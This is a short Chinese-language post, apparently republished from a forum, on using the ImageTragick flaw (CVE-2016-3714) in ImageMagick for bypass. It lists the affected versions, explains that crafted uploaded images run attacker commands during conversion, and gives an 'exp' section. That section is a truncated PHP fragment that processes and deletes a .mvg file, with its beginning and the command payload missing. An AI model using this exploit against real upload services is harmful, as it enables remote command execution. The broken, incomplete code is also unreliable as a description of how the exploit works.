利用 ImageMagick 漏洞绕过（一）

# 利用 ImageMagick 漏洞绕过（一）

> 原文：[https://www.zhihuifly.com/t/topic/3470](https://www.zhihuifly.com/t/topic/3470)

## 利用 ImageMagick 漏洞绕过（一）

**1.利用条件**

Imagick <= 3.3.0 PHP >= 5.4

**2.基本原理**

ImageTragick（CVE-2016-3714）
漏洞的利用过程非常简单，只要将精心构造的图片上传至使用漏洞版本的ImageMagick，ImageMagick会自动对其格式进行转换，转换过程中就会执行攻击者插入在图片中的命令。因此很多具有头像上传、图片转换、图片编辑等具备图片上传功能的网站都可能会中招。

**3.exp**

“`
readImage(‘KKKK.mvg’);

$thumb->writeImage(‘KKKK.png’);

$thumb->clear();

$thumb->destroy();

unlink(“KKKK.mvg”);

unlink(“KKKK.png”);

?>`
“`